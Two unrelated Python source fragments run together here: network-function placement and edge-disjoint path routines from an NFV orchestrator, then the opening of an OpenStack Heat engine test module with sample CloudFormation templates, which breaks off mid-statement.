      # just one), and the single-consumer branch (len == 1) performs no
      # anchoring at all -- confirm both are intentional.
      for mappable_consumer_tup in unambiguously_mappable_consumers:
        # key of the current unambiguously mappable element
        anchoring_consumer_id = mappable_consumer_tup[0]
        # NF of the first (there might be other) consumer port
        anchor_point_nf = request_cons_prov_dict[
          anchoring_consumer_id][0][0].node
        log.debug("Introducing VNF %s as anchor point for the service graph "
                  "based on unambiguous mapping of consumer SAP %s"
                  %(anchor_point_nf.id, anchoring_consumer_id))
        # map this NF based on first fit mapping, so during preprocessing
        # this will be added as an already rechained starting point for subchain
        # finding algorithm.
        network = firstFitMapOneVNF(anchor_point_nf, network)
  return network
def doesMappingComplyToSAPAliasCriteria(resource, infra_id, vnf, running_vnfs):
  """
  Checks whether this vnf mapping complies to the SAP
  alias criteria during the greedy process's current state when
  running_or_mapped_vnfs are mapped to the same infra as we are checking for
  vnf_id.
  Returns true if there is no SAP alias criteria or if this mapping satisfies
  it according to the current state.
  NOTE: this could return some metric, which could influence the objective
  function value to make some ordering among the possibilities

  :param infra_id: where we are checking to map vnf
  :param resource: The nffg's networkx object which is maintained by the
    mapping process (NFs are not there!)
  :param vnf: the VNF to map to the same place where
  :param running_vnfs: references to VNFs which mapped (earlier or
    this orchestration) to the possible host of vnf
  :return: bool
  """
  # gather this VNF's SAP-alias ports: any number of provided services,
  # at most one consumed service
  provider_ports = []
  consumer_port = None
  for p in vnf.ports:
    if p.role == NFFG.PORT_ROLE_PROVIDER and p.sap is not None:
      provider_ports.append(p)
    if p.role == NFFG.PORT_ROLE_CONSUMER and p.sap is not None:
      if consumer_port is not None:
        if consumer_port.sap != p.sap:
          raise uet.BadInputException("A VNF should only consume one service",
                                      "Consumer VNF %s has multiple SAP "
                                      "consumers with different service %s and "
                                      "%s" % (vnf.id, consumer_port.sap, p.sap))
      consumer_port = p
  if len(provider_ports) > 0:
    log.debug("VNF %s has provider ports: %s"%(vnf.id, provider_ports))
  if consumer_port is not None:
    log.debug("VNF %s has consumer port: %s"% (vnf.id, consumer_port))
  if len(provider_ports) > 0:
    # we need to map a provider NF to the same Infra where a SAP is connected
    # with the same SAP provider data
    # INSTEAD: we can map sap provider anywhere!
    # lets continue checking, consumer port criteria may spoil it.
    pass
  if consumer_port is not None:
    # we need to map a consumer NF to the same Infra where there is an already
    # mapped NF with this SAP service provider
    for vnf_obj in running_vnfs:
      for possible_provider_p in vnf_obj.ports:
        if possible_provider_p.role == NFFG.PORT_ROLE_PROVIDER and \
              possible_provider_p.sap == consumer_port.sap and \
              possible_provider_p.sap is not None:
          log.debug("VNF %s mapping to Infra %s complies to SAP consumer-"
                    "provider criteria because of provider VNF %s"
                    %(vnf.id, infra_id, vnf_obj.id))
          return True
    # OR where there is an appropriate SAP provider port on a SAP
    for node_id in resource.neighbors_iter(infra_id):
      node_obj = resource.node[node_id]
      if node_obj.type == 'SAP':
        for possible_provider_p in node_obj.ports:
          if possible_provider_p.sap == consumer_port.sap and \
                possible_provider_p.sap is not None:
            log.debug("VNF %s mapping to Infra %s complies to SAP consumer-"
                      "provider criteria because of provider SAP %s"
                      %(vnf.id, infra_id, node_id))
            return True
    else:
      # for-else: the loop has no break, so this always runs when no provider
      # was found above -- the consumer criteria is unsatisfied
      return False
  # There is no any Provider or Consumer SAP criteria here!
  return True
def _addBackwardAffinityCriteria (nffg, nf_id, aaff_pair_id, aaff_id, aff_type):
  """
  Adds a backward Anti-Affinity reference from one NF to another.

  :param nffg: :class:`NFFG` to work on with the anti-affinity.
  :param nf_id: NF ID containing the anti-affinity.
  :param aaff_pair_id: NF ID which must be in affinity with the current NF
  :param aaff_id: string of anti-affinity relation ID
  :param aff_type: one of 'affinity' or 'antiaffinity'
  :return: None
  """
  # only add the backward reference if it is not present yet; the values of
  # the constraint dict are the NF IDs in (anti)affinity relation
  if nf_id not in getattr(nffg.network.node[aaff_pair_id].constraints,
                          aff_type).itervalues():
    log.debug("Add backward %s between VNFs %s and %s to "
              "make it symmetric." % (aff_type, nf_id, aaff_pair_id))
    # the backward relation reuses the forward ID with a "-back" suffix
    getattr(nffg.network.node[aaff_pair_id].constraints,
            aff_type)[aaff_id + "-back"] = nf_id
def makeAffinityCriteriaSymmetric (req, net):
  """
  Checks all anti-affinity requirements and makes them symmetric so the greedy
  mapping process would see the requirement from each direction. If the anti-
  affinity pair is not in the request graph, but it is in the substrate NFFG,
  then it is added to the request, so anti-affinity delegation could be resolved
  in case of embedding failure due to the unresolvable anti-affinity.
  These extra VNF-s are handled well as VNFs to be left in place both in terms
  of vnf_mapping structure and substrate resource handling.

  :param req: request graph to process
  :param net: resource, which may contain mapped NFs in affinity relation
    with requested NFs.
  :return: None (the request graph is modified in place)
  """
  for aff_type in ("affinity", "antiaffinity"):
    for nf in req.nfs:
      if len(getattr(nf.constraints, aff_type)) > 0:
        for aaff_id, aaff_pair_id in \
              getattr(nf.constraints, aff_type).iteritems():
          if aaff_pair_id in req:
            # the pair is requested too: just mirror the relation
            _addBackwardAffinityCriteria(req, nf.id, aaff_pair_id,
                                         aaff_id, aff_type)
          elif aaff_pair_id in net:
            # the pair is already mapped: pull a copy into the request so
            # the relation (and its delegation) can be handled there
            req.add_node(copy.deepcopy(net.network.node[aaff_pair_id]))
            _addBackwardAffinityCriteria(req, nf.id, aaff_pair_id,
                                         aaff_id, aff_type)
          else:
            # BUGFIX: format arguments were misordered, producing a garbled
            # message ("VNF antiaffinity not found for <pair_id> ...").
            raise uet.BadInputException("The %s should refer to a VNF "
                                        "which is in the request graph or "
                                        "mapped already in the "
                                        "substrate graph" % aff_type,
                                        "VNF %s not found for %s from %s"
                                        " to %s" % (aaff_pair_id, aff_type,
                                                    nf.id, aaff_pair_id))
def processAllowedNodesConstraintToPlacementCriteria (nffg, substrate=None):
  """
  Placement criteria is given in the form of constraint['allowed_nodes'] =
  "('BisBiS1', 'BisBiS2', 'BisBis3')" (string format!). This function
  processes this into NodeNF.placement_criteria for all NFs of the input NFFG.

  :param substrate: If None, only infras from NFFG can be in placement_crit.
  :param nffg: request NFFG whose NFs are processed in place
  :return: the modified nffg
  """
  for nf in nffg.nfs:
    placement_criteria = None
    if nf.constraints.has_constraint('allowed_nodes'):
      # the constraint value is a python literal in string form
      placement_criteria = ast.literal_eval(
        nf.constraints.constraint['allowed_nodes'])
    if nf.constraints.has_constraint('banned_nodes'):
      # banned nodes are resolved against some set of infras: the substrate
      # if given, otherwise this NFFG itself (which then must have infras)
      if len([n for n in nffg.infras]) == 0 and substrate is None:
        raise uet.InternalAlgorithmException(
          "Banned nodes cannot be processed, because possible nodes are not "
          "available!")
      elif substrate is None:
        nffg_to_search_allowed = nffg
      else:
        nffg_to_search_allowed = substrate
      banned_nodes = ast.literal_eval(
        nf.constraints.constraint['banned_nodes'])
      if placement_criteria is None:
        placement_criteria = []
      else:
        # we need to filter banned nodes from allowed nodes
        # (Python 2 filter returns a list, so append below works)
        placement_criteria = filter(lambda i, ban=banned_nodes: i not in ban,
                                    placement_criteria)
      # NOTE(review): this also extends an explicitly allowed list with every
      # non-banned infra -- confirm that is the intended semantics when both
      # allowed_nodes and banned_nodes are present.
      for infra in nffg_to_search_allowed.infras:
        if infra.id not in banned_nodes and infra.id not in placement_criteria:
          placement_criteria.append(infra.id)
    if placement_criteria is not None:
      setattr(nf, 'placement_criteria', placement_criteria)
      if len(nf.placement_criteria) == 0:
        raise uet.BadInputException(
          "The 'allowed nodes' constraint should give possilbe NF placements",
          "'allowed_nodes' container for VNF %s in NFFG %s is empty!" %
          (nf.id, nffg.id))
      log.debug("Processed incoming placement criteria on VNF %s: %s"%
                (nf.id, nf.placement_criteria))
      # delete allowed nodes and banned nodes constraints, they are handled by
      # placement criteria attribute and solved in the mapping.
      nf.constraints.del_constraint('allowed_nodes')
      nf.constraints.del_constraint('banned_nodes')
  return nffg
def firstFitMapOneVNF (single_nf, net):
  """
  Maps NF to the first Infra which is capable of hosting it.

  :param single_nf: NodeNF object to map.
  :param net: substrate NFFG object to map the NF
  :return: the modified substrate NFFG
  :raises uet.BadInputException: when no infra can host the NF
  """
  # wrap the NF into a one-element NFFG so its allowed/banned node
  # constraints can be translated into placement_criteria
  singe_nf_nffg = NFFG()
  singe_nf_nffg.add_nf(nf=single_nf)
  singe_nf_nffg = processAllowedNodesConstraintToPlacementCriteria(
    singe_nf_nffg, substrate=net)
  net.calculate_available_node_res()
  for infra in net.infras:
    for nf in singe_nf_nffg.nfs:
      # first infra satisfying type, free resources and placement criteria
      if nf.functional_type in infra.supported and infra.availres['mem'] >= \
            nf.resources['mem'] and infra.availres['cpu'] >= nf.resources['cpu'] and \
            infra.availres['storage'] >= nf.resources['storage'] and \
            (infra.id in nf.placement_criteria or len(nf.placement_criteria) == 0):
        # Check SAP alias mapping criteria too!
        if not doesMappingComplyToSAPAliasCriteria(net.network, infra.id, nf,
                                                   [n for n in net.running_nfs(infra.id)]):
          continue
        # TODO: add DYNAMIC link connection to VNF should be refactored into
        # separate function, this feature is also used in constructOutputNFFG a
        # couple of times
        net.add_nf(copy.deepcopy(nf))
        # reuse the NF's first port; the for-else fires (creates a port)
        # only when the NF has no ports at all
        for p in nf.ports:
          nf_port = p
          break
        else:
          nf_port = nf.add_port()
        infra_port_id = "|".join((str(infra.id), str(nf.id), str(nf_port.id)))
        try:
          out_infra_port = net.network.node[infra.id].ports[infra_port_id]
          log.debug("Port %s found in Infra %s leading to port %s of NF"
                    " %s." % (infra_port_id, infra.id, nf_port, nf.id))
        except KeyError:
          out_infra_port = net.network.node[infra.id].add_port(id=infra_port_id)
          log.debug("Port %s added to Infra %s to NF %s."
                    % (out_infra_port.id, infra.id, nf.id))
        log.debug("Mapped VNF %s based on first fit mapping to infra node %s"%
                  (single_nf.id, infra.id))
        net.add_undirected_link(out_infra_port, nf_port, dynamic=True)
        return net
  else:
    # for-else: no infra could host the NF
    # NOTE(review): 'nf' is the inner loop variable; it is unbound here if
    # the network has no infras at all -- confirm callers guarantee one.
    raise uet.BadInputException("Enough resources should be available in the "
                                "network for all NFs", "Not enough resources "
                                "found on any of the infras for VNF %s"%nf.id)
def genStartingEndingNodes(G, current_path, current_linkids):
  """
  Returns the cutting points of the paths, where an alternative path shall
  be inserted.
  This implementation gives back every two ends of all links in the order of
  the path.

  :param G: unused here, kept for interface compatibility
  :param current_path: node ID list of the path
  :param current_linkids: link ID list of the path
  :return: generator of (start node, first link after,
    last link before ending point, ending node) tuples
  """
  path_heads = current_path[:-1]
  path_tails = current_path[1:]
  for head, tail, link_id in zip(path_heads, path_tails, current_linkids):
    yield head, link_id, link_id, tail
def getForbiddenLinks(start, end, current_path, current_linkids):
  """
  Based on the given cutting point, identifies which links of the path should
  be replaced.
  This implementation returns the first link leaving ``start`` on the path
  (``end`` is unused); implicitly returns None when ``start`` is not found.

  :param start: starting cutting point node ID
  :param end: ending cutting point node ID (unused)
  :param current_path: node ID list of the path
  :param current_linkids: link ID list of the path
  :return: one-element list of a link ID, or None
  """
  for node, link_id in zip(current_path[:-1], current_linkids):
    if node == start:
      return [link_id]
def generateAlternativePaths(G, current_path, current_linkids,
                             weight='weight', routing_criteria=None,
                             max_path_cnt=3):
    """
    Generate paths which differ from the given path in at least one link.

    All returned paths connect the starting and ending node of the given
    path.
    NOTE: this may be refactored into a separate strategy class, where
    multiple implementations could be provided for the interface of
    forbidden links and starting/ending nodes.

    :param G: graph to generate the alternative paths on
    :param current_path: node ID list of a path between source and target
    :param current_linkids: link ID list of a path between source and target
    :param weight: edge data key used as weight for the path search
    :param routing_criteria: list of useable nodes, None means all
    :param max_path_cnt: max number of alternative paths returned
    :return: list of (node ID list, link ID list) tuples
    """
    # guard clause: a non-positive budget means no alternatives are wanted
    if max_path_cnt <= 0:
        return []
    log.debug("Looking for at most %s path alternatives of %s, %s"%
              (max_path_cnt, current_path, current_linkids))
    alternatives = []
    # iterate over the possible cutting points of the original path
    for start, start_link_id, end_link_id, end in genStartingEndingNodes(
            G, current_path, current_linkids):
        # forbid some of the links between the cutting points so the path
        # search is forced onto a detour
        banned_links = getForbiddenLinks(start, end, current_path,
                                         current_linkids)
        path_dict, linkid_dict = shortestPathsBasedOnEdgeWeight(
            G, start, weight=weight, target=end,
            routing_criteria=routing_criteria, forbidden_links=banned_links)
        if end not in path_dict or end not in linkid_dict:
            # no detour exists between this pair of cutting points
            continue
        # splice the detour into the original path between the cutting points
        new_path = current_path[:current_path.index(start)]
        new_path.extend(path_dict[end])
        new_path.extend(current_path[current_path.index(end) + 1:])
        new_linkids = current_linkids[:current_linkids.index(start_link_id)]
        new_linkids.extend(linkid_dict[end])
        new_linkids.extend(
            current_linkids[current_linkids.index(end_link_id) + 1:])
        alternatives.append((new_path, new_linkids))
        log.debug("Path alternative found on path %s, %s"%(new_path,
                                                           new_linkids))
        if len(alternatives) == max_path_cnt:
            break
    return alternatives
def shortest_edge_disjoint_paths(G, source, target, k=2, weight='weight',
                                 node_id_separator_char='%'):
    """
    Calculates k edge disjoint paths from source to target, which have minimal
    total edge weight based on the given weighting key.

    Successive-shortest-path scheme: 2-cycles are first broken up with
    temporary nodes to make the graph antisymmetric, then one shortest path
    is added per iteration while edge weights are re-normalized with the
    Dijkstra distances and the used edges are reversed; a new path that
    traverses reversed edges of earlier paths triggers a crossover splice.
    Raises exception if the problem is not feasible.
    # TODO: Write comments obeying to NetworkX conventions, and submit it for
    incorporating into the library.
    Thanks to Torsten Tholey, Universitat Augsburg for the slides:
    https://thiserver.informatik.uni-augsburg.de/personen/lei11.pdf

    :param weight: key to use as edge weight.
    :param source: source node ID
    :param target: destination node ID
    :param k: number of disjoint paths to look for
    :param node_id_separator_char: used to concatenate and separate node IDs
    :return: list of lists containing the shortest path ID-s
    """
    import networkx as nx
    # make some input checking, whether the problem is feasible.
    if source == target:
        raise nx.NetworkXUnfeasible("Source and target nodes must be different for "
                                    "disjoint path finding.")
    if nx.edge_connectivity(G, source, target) < k:
        raise nx.NetworkXUnfeasible("There are no k=%s disjoint paths in the given "
                                    "graph."%k)
    # working graph which is a complete modifiable copy.
    R = G.copy()
    # maps a replaced (i, j) edge to the temporary node inserted on it
    replaced_edges = {}
    # cycles with length 2 must be replaced to make G antisymmetric
    for i, j in G.edges_iter():
        if G.has_edge(j, i):
            # handle both directions of the 2-cycle (see the swap below)
            for _ in xrange(0, 2):
                if R.has_edge(i, j):
                    tmp_node_id = node_id_separator_char.join((str(i), str(j)))
                    replaced_edges[(i, j)] = tmp_node_id
                    # replace i,j,key with a node and two edges.
                    R.remove_edge(i, j)
                    R.add_edge(i, tmp_node_id, attr_dict=G[i][j])
                    # make the 'weight' attribute of the second link artificially 0, so
                    # it won't interfere with the shortest path calculation!
                    R.add_edge(tmp_node_id, j)
                    R[tmp_node_id][j][weight] = 0
                # make the same replacement on the opposite edge.
                j, i = i, j
    # stores the currently found disjoint path of G
    disjoint_paths = []
    while len(disjoint_paths) < k:
        try:
            dist_R, shortest_paths_R = nx.single_source_dijkstra(R, source,
                                                                 weight=weight)
            P = shortest_paths_R[target]
            if len(disjoint_paths) > 0 and len(P) > 2:
                # P may traverse reversed edges of earlier disjoint paths;
                # cut everything into pieces at the crossovers and re-join.
                path_pieces = {}
                path_piece_key = 0
                new_disjoint_paths = []
                # every already found disjoint path piece initially ends in target
                disjoint_piece_endings = [target] * len(disjoint_paths)
                iterator_P = iter(zip(P[:-1], P[1:]))
                i, j = next(iterator_P)
                # we need to store that part of P, which connects disjoint_P-s
                # first link, cannot be in any crossover part.
                inter_disjoint_P_part_of_P = [i, j]
                while j != target:
                    # initially all firstly found chain pieces end in target.
                    disjoint_paths_with_piece_endings = zip(disjoint_paths,
                                                            disjoint_piece_endings)
                    disjoint_piece_endings = []
                    # either we are on a crossover track or between disjoint paths.
                    during_crossover = False
                    i, j = next(iterator_P)
                    # disjoint_paths list always contains paths directed according to
                    # the original G
                    for disjoint_P, piece_ending in disjoint_paths_with_piece_endings:
                        during_crossover = False
                        # we need to iterate on the edges of disjoint_P from the target
                        disjoint_P_not_yet_processed_part = disjoint_P[:disjoint_P.
                                                                       index(piece_ending) + 1]
                        edges_of_disjoint_P = zip(disjoint_P_not_yet_processed_part[:-1],
                                                  disjoint_P_not_yet_processed_part[1:])
                        edges_of_disjoint_P.reverse()
                        for crossover_i, crossover_j in edges_of_disjoint_P:
                            # a crossover means P runs backwards on this edge
                            if not during_crossover and crossover_i == j and crossover_j == i:
                                # here a new crossover has just started, we were coming on P
                                # for a while and the remaining part of this disjoint_P can
                                # be concatenated.
                                # NOTE: if this is the very first crossover, then new_piece is
                                # already the first disjoint path!
                                new_piece = inter_disjoint_P_part_of_P
                                new_piece.extend(disjoint_P_not_yet_processed_part[
                                                 disjoint_P_not_yet_processed_part.
                                                 index(crossover_j) + 1:])
                                path_pieces[path_piece_key] = new_piece
                                path_piece_key += 1
                                during_crossover = True
                                i, j = next(iterator_P)
                            elif during_crossover and crossover_i == j and crossover_j == i:
                                # this part needs to be discarded, we are during a crossover
                                i, j = next(iterator_P)
                            elif during_crossover and crossover_i != j and crossover_j == i:
                                # we are leaving the crossover part
                                disjoint_piece_endings.append(crossover_j)
                                # we are now between disjoint_P-s, there is at least one edge
                                # between them. at least this link is part of the inter
                                # disjoint path part of P
                                inter_disjoint_P_part_of_P = [i, j]
                                if j != target:
                                    i, j = next(iterator_P)
                                during_crossover = False
                                # we continue to look for other crossovers with other disjoint_P
                                break
                        else:
                            # piece_ending stays the current piece_ending, if we didn't cross
                            # over this disjoint_P.
                            disjoint_piece_endings.append(piece_ending)
                    # if now crossover was not detected, (i, j) still stay the same
                    # for the other disjoint_P-s.
                    if not during_crossover:
                        # we are between disjoint_P-s and we didn't manage to
                        # find a crossover
                        inter_disjoint_P_part_of_P.append(j)
                # this is the last part of P, which hasn't crossed over any disjoint_P-s
                path_pieces[path_piece_key] = inter_disjoint_P_part_of_P
                path_piece_key += 1
                # we need this remaining beginnings of the disjoint_P-s too.
                for disjoint_P, piece_ending in zip(disjoint_paths,
                                                    disjoint_piece_endings):
                    path_pieces[path_piece_key] = disjoint_P[:disjoint_P.
                                                             index(piece_ending) + 1]
                    path_piece_key += 1
                # we need to pair up the path pieces to construct the new disjoint_paths
                # There is exactly one continuation for all of the path pieces.
                while len(path_pieces) > 0:
                    path_piece_key_to_del = []
                    path_piece_to_add = []
                    for k1, first_path_piece in path_pieces.iteritems():
                        if first_path_piece[0] == source and first_path_piece[-1] == target:
                            # a complete source->target path: finished piece
                            new_disjoint_paths.append(first_path_piece)
                            path_piece_key_to_del.append(k1)
                            break
                        elif first_path_piece[0] == source:
                            # look for the unique piece continuing this one
                            for k2, second_path_piece in path_pieces.iteritems():
                                if first_path_piece[-1] == second_path_piece[0]:
                                    new_longer_piece = first_path_piece
                                    path_piece_key_to_del.append(k1)
                                    path_piece_key_to_del.append(k2)
                                    new_longer_piece.extend(second_path_piece[1:])
                                    if new_longer_piece[-1] == target:
                                        new_disjoint_paths.append(new_longer_piece)
                                    else:
                                        path_piece_to_add.append(new_longer_piece)
                                    break
                        elif first_path_piece[0] == first_path_piece[-1]:
                            # some path pieces can be discarded.
                            path_piece_key_to_del.append(k1)
                            break
                    # execute the changes on path pieces.
                    for key in path_piece_key_to_del:
                        del path_pieces[key]
                    for longer_piece in path_piece_to_add:
                        path_pieces[path_piece_key] = longer_piece
                        path_piece_key += 1
                # the number of disjoint paths has increased by one!
                disjoint_paths = new_disjoint_paths
            else:
                disjoint_paths.append(P)
            # create new edge weights (reduced costs stay non-negative)
            for i, j, data in R.edges_iter(data=True):
                try:
                    data[weight] = data[weight] + dist_R[i] - dist_R[j]
                except KeyError:
                    # node unreachable from source: no distance to apply
                    continue
            # reverse the edges on the shortest path, keeping the new edge weights
            for i, j in zip(P[:-1], P[1:]):
                R.add_edge(j, i, attr_dict=R[i][j])
                R.remove_edge(i, j)
            # at this point, the disjoint_paths list must always contains correct
            # paths of G, except the temporarily added nodes can still be there.
        except nx.NetworkXNoPath:
            raise nx.NetworkXAlgorithmError(
                "k=%s disjoint paths haven't been found, while the edge connectivity of"
                " the graph is %s" % (k, nx.edge_connectivity(G, source, target)))
    # simply remove the temporarily added nodes from the disjoint paths
    tmp_node_filtered_disjoint_paths = []
    for disjoint_P in disjoint_paths:
        filtered_path = filter(lambda n, to_filter=replaced_edges.values():
                               n not in to_filter, disjoint_P)
        # it can happen that the additional nodes introduce unnecessary cycles
        # into the disjoint paths, which can be removed (edge weights are positive,
        # and paths stay disjoint)
        to_cut = []
        last_node = None
        index = 0
        for node in filtered_path:
            if last_node is not None and last_node == node:
                to_cut.append(index)
            last_node = node
            index += 1
        # during removal the indexes needs to be shifted. (or removed in
        # reverse order)
        index_offset = 0
        for idx in to_cut:
            filtered_path.pop(idx - index_offset)
            index_offset += 1
        tmp_node_filtered_disjoint_paths.append(filtered_path)
    return tmp_node_filtered_disjoint_paths
if __name__ == '__main__':
    # tests the shortest_edge_disjoint_paths function with random graphs.
    # TODO: couple of times it fails to return disjoint paths
    import networkx as nx
    import random
    # fixed seed so failing cases are reproducible
    random.seed(6)
    for test in xrange(0, 10000):
        # random directed graph; per-test seed keeps graphs reproducible too
        G = nx.gnm_random_graph(random.randint(20, 400), random.randint(90, 3000),
                                directed=True, seed=test)
        for i, j in G.edges_iter():
            G[i][j]['weight'] = random.random()
        connectivity = nx.edge_connectivity(G)
        if connectivity > 1:
            print "Testing with: no. %s, nodes: %s, edges: %s, connectivity: %s"%\
                  (test, G.number_of_nodes(), G.number_of_edges(), connectivity)
            source = random.choice(G.nodes())
            target = random.choice(G.nodes())
            # k can be at most the global edge connectivity
            k = random.randint(2, connectivity)
            try:
                print "Function parameters: source: %s, target: %s, k: %s"%\
                      (source, target, k)
                paths = shortest_edge_disjoint_paths(G, source=source, target=target, k=k)
                print paths
                paths_zipped = []
                for p in paths:
                    # every returned path must run from source to target
                    if p[0] != source or p[-1] != target:
                        raise Exception("not ending/finishing in target/source!")
                    paths_zipped.extend(zip(p[:-1], p[1:]))
                # disjointness check: no edge may occur in two returned paths
                if len(set(paths_zipped)) != len(paths_zipped):
                    print "zipped: ", paths_zipped, "size: ", len(paths_zipped)
                    print "removed dups: ", set(paths_zipped), "size: ", len(set(paths_zipped))
                    for l in paths_zipped:
                        if paths_zipped.count(l) > 1:
                            print "dup: ", l
                    raise Exception("common edges of disjoint paths were found!")
            except nx.NetworkXUnfeasible as nu:
                # e.g. source == target was drawn, or k paths do not exist
                print "Skipping ", test, nu.message
        else:
            print "Skipping ", test
| |
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import uuid
import mock
import mox
from oslo_config import cfg
from oslo_messaging.rpc import dispatcher
from oslo_serialization import jsonutils as json
import six
from heat.common import context
from heat.common import exception
from heat.common import identifier
from heat.common import template_format
from heat.engine.cfn import template as cfntemplate
from heat.engine import dependencies
from heat.engine import environment
from heat.engine.hot import functions as hot_functions
from heat.engine.hot import template as hottemplate
from heat.engine import resource as res
from heat.engine import service
from heat.engine import stack as parser
from heat.engine import template as templatem
from heat.objects import stack as stack_object
from heat.tests import common
from heat.tests.engine import tools
from heat.tests import generic_resource as generic_rsrc
from heat.tests.nova import fakes as fakes_nova
from heat.tests import utils
cfg.CONF.import_opt('engine_life_check_timeout', 'heat.common.config')
cfg.CONF.import_opt('enable_stack_abandon', 'heat.common.config')
wp_template_no_default = '''
{
"AWSTemplateFormatVersion" : "2010-09-09",
"Description" : "WordPress",
"Parameters" : {
"KeyName" : {
"Description" : "KeyName",
"Type" : "String"
}
},
"Resources" : {
"WebServer": {
"Type": "AWS::EC2::Instance",
"Properties": {
"ImageId" : "F17-x86_64-gold",
"InstanceType" : "m1.large",
"KeyName" : "test",
"UserData" : "wordpress"
}
}
}
}
'''
policy_template = '''
{
"AWSTemplateFormatVersion" : "2010-09-09",
"Description" : "alarming",
"Resources" : {
"WebServerScaleDownPolicy" : {
"Type" : "AWS::AutoScaling::ScalingPolicy",
"Properties" : {
"AdjustmentType" : "ChangeInCapacity",
"AutoScalingGroupName" : "",
"Cooldown" : "60",
"ScalingAdjustment" : "-1"
}
},
"Random" : {
"Type" : "OS::Heat::RandomString"
}
}
}
'''
user_policy_template = '''
{
"AWSTemplateFormatVersion" : "2010-09-09",
"Description" : "Just a User",
"Parameters" : {},
"Resources" : {
"CfnUser" : {
"Type" : "AWS::IAM::User",
"Properties" : {
"Policies" : [ { "Ref": "WebServerAccessPolicy"} ]
}
},
"WebServerAccessPolicy" : {
"Type" : "OS::Heat::AccessPolicy",
"Properties" : {
"AllowedResources" : [ "WebServer" ]
}
},
"HostKeys" : {
"Type" : "AWS::IAM::AccessKey",
"Properties" : {
"UserName" : {"Ref": "CfnUser"}
}
},
"WebServer": {
"Type": "AWS::EC2::Instance",
"Properties": {
"ImageId" : "F17-x86_64-gold",
"InstanceType" : "m1.large",
"KeyName" : "test",
"UserData" : "wordpress"
}
}
}
}
'''
server_config_template = '''
heat_template_version: 2013-05-23
resources:
WebServer:
type: OS::Nova::Server
'''
class StackCreateTest(common.HeatTestCase):
    """Tests for the basic create/adopt/delete life cycle of a stack."""

    def setUp(self):
        super(StackCreateTest, self).setUp()

    def test_wordpress_single_instance_stack_create(self):
        """Creating a stored stack brings up the WebServer resource."""
        stack = tools.get_stack('test_stack', utils.dummy_context())
        tools.setup_mocks(self.m, stack)
        self.m.ReplayAll()
        stack.store()
        stack.create()
        self.assertIsNotNone(stack['WebServer'])
        self.assertTrue(int(stack['WebServer'].resource_id) > 0)
        self.assertNotEqual(stack['WebServer'].ipaddress, '0.0.0.0')

    def test_wordpress_single_instance_stack_adopt(self):
        """Adopting with matching adopt data reuses the given resource id."""
        t = template_format.parse(tools.wp_template)
        template = templatem.Template(t)
        ctx = utils.dummy_context()
        adopt_data = {
            'resources': {
                'WebServer': {
                    'resource_id': 'test-res-id'
                }
            }
        }
        stack = parser.Stack(ctx,
                             'test_stack',
                             template,
                             adopt_stack_data=adopt_data)
        tools.setup_mocks(self.m, stack)
        self.m.ReplayAll()
        stack.store()
        stack.adopt()
        self.assertIsNotNone(stack['WebServer'])
        self.assertEqual('test-res-id', stack['WebServer'].resource_id)
        self.assertEqual((stack.ADOPT, stack.COMPLETE), stack.state)

    def test_wordpress_single_instance_stack_adopt_fail(self):
        """Adopt data missing the resource leaves the stack ADOPT/FAILED."""
        t = template_format.parse(tools.wp_template)
        template = templatem.Template(t)
        ctx = utils.dummy_context()
        # 'WebServer1' does not match the template's 'WebServer' resource,
        # so no resource_id is available for adoption.
        adopt_data = {
            'resources': {
                'WebServer1': {
                    'resource_id': 'test-res-id'
                }
            }
        }
        stack = parser.Stack(ctx,
                             'test_stack',
                             template,
                             adopt_stack_data=adopt_data)
        tools.setup_mocks(self.m, stack)
        self.m.ReplayAll()
        stack.store()
        stack.adopt()
        self.assertIsNotNone(stack['WebServer'])
        expected = ('Resource ADOPT failed: Exception: resources.WebServer: '
                    'Resource ID was not provided.')
        self.assertEqual(expected, stack.status_reason)
        self.assertEqual((stack.ADOPT, stack.FAILED), stack.state)

    def test_wordpress_single_instance_stack_delete(self):
        """Deleting a created stack completes and soft-deletes the DB row."""
        ctx = utils.dummy_context()
        stack = tools.get_stack('test_stack', ctx)
        fc = tools.setup_mocks(self.m, stack, mock_keystone=False)
        self.m.ReplayAll()
        stack_id = stack.store()
        stack.create()
        db_s = stack_object.Stack.get_by_id(ctx, stack_id)
        self.assertIsNotNone(db_s)
        self.assertIsNotNone(stack['WebServer'])
        self.assertTrue(int(stack['WebServer'].resource_id) > 0)
        # make the fake nova client report the server as already gone
        self.patchobject(fc.servers, 'delete',
                         side_effect=fakes_nova.fake_exception())
        stack.delete()
        rsrc = stack['WebServer']
        self.assertEqual((rsrc.DELETE, rsrc.COMPLETE), rsrc.state)
        # Bug fix: this assertion previously re-checked rsrc.state; it must
        # verify the *stack* itself reached (DELETE, COMPLETE).
        self.assertEqual((stack.DELETE, stack.COMPLETE), stack.state)
        # soft-deleted stacks are no longer returned by get_by_id ...
        self.assertIsNone(stack_object.Stack.get_by_id(ctx, stack_id))
        # ... but the refreshed DB row still records the final action/status
        db_s.refresh()
        self.assertEqual('DELETE', db_s.action)
        self.assertEqual('COMPLETE', db_s.status)
class StackConvergenceServiceCreateUpdateTest(common.HeatTestCase):
    """Create/update through the engine service with convergence enabled."""

    def setUp(self):
        super(StackConvergenceServiceCreateUpdateTest, self).setUp()
        # force the convergence code path inside the engine service
        cfg.CONF.set_override('convergence_engine', True)
        self.ctx = utils.dummy_context()
        self.man = service.EngineService('a-host', 'a-topic')

    def _stub_update_mocks(self, stack_to_load, stack_to_return):
        # Stub out stack loading plus template/environment construction so
        # that update_stack() works on our prepared stack objects.
        self.m.StubOutWithMock(parser, 'Stack')
        self.m.StubOutWithMock(parser.Stack, 'load')
        parser.Stack.load(self.ctx, stack=stack_to_load
                          ).AndReturn(stack_to_return)
        self.m.StubOutWithMock(templatem, 'Template')
        self.m.StubOutWithMock(environment, 'Environment')

    def _test_stack_create_convergence(self, stack_name):
        # Create a stack via the service API and verify the convergence
        # flag is persisted on the stored stack.
        params = {'foo': 'bar'}
        template = '{ "Template": "data" }'
        stack = tools.get_stack(stack_name, self.ctx,
                                template=tools.string_template_five,
                                convergence=True)
        self.m.StubOutWithMock(templatem, 'Template')
        self.m.StubOutWithMock(environment, 'Environment')
        self.m.StubOutWithMock(parser, 'Stack')
        templatem.Template(template, files=None,
